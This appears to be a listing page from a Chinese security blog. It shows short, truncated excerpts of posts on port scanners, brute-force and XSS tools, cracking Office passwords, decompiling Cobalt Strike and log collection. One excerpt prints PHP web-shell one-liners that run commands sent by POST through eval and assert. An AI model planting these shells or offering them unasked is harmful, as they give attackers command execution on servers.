目前支持的功能 1 2 3 4 5 6 7 8 9 10 11 全自动扫描: python webmain.py -a  target.com        -->  baidu_site && port/di…

搞安全的应该都知道端口扫描在渗透测试、漏洞扫描过程中的重要性，其与URL爬虫等技术构成了漏洞扫描的第一阶段，即目标信息收集。因此能否开发出一款高效稳定的端口扫描器，往往决定了漏洞扫描器的好坏。那么说到端口扫描器，我们往往会先想到nm…

eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…

首先要下载 office2john.py，支持破解的加密为office自带的加密功能，即： 使用office2john将office转换为hash： 1 python office2john.py 123.docx > has…

项目地址：https://github.com/ex0dus-0x/brut3k1t 1. Introduction brut3k1t是一款服务端的暴力破解模块，支持多种协议的字典攻击。目前完整支持的协议有： [crayon-5d8…

xssfork简介 xssfork作为sicklescan的一个功能模块，其开发主要目的是用于检测xss漏洞。 传统的xss探测工具，一般都是采用 payload in response的方式，即在发送一次带有payload的htt…

0x00 介绍 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现，但它可在许多地址上运行，而不是仅一个地址。 主页 | 仓库 作者：Steve …

0x00 简介 cobaltstrike3.10 已经出来很久了，其中最吸引人的可能就是他已经支持中文了，但是貌似很久以来都没在网上看到3.10的资源，所以就没办法，拿手上的3.8 改改将就用。 0x01 反编译 首先我们要对cob…

“Scripter”（又名XSSer）是一个自动框架，用于在基于Web的应用程序中检测，利用和报告XSS漏洞。 下载地址： git clone https://github.com/epsylon/xsser 安装： XSSer在许…

项目背景 公司项目需要将分布在多台机器中的日志统一收集管理。笔者先后使用logstash，flume等开源项目。并最终自研一套基于Java语言的日志收集系统 Bloodhound。以下从项目关注的角度对开源系统与自研进行分析。 1 …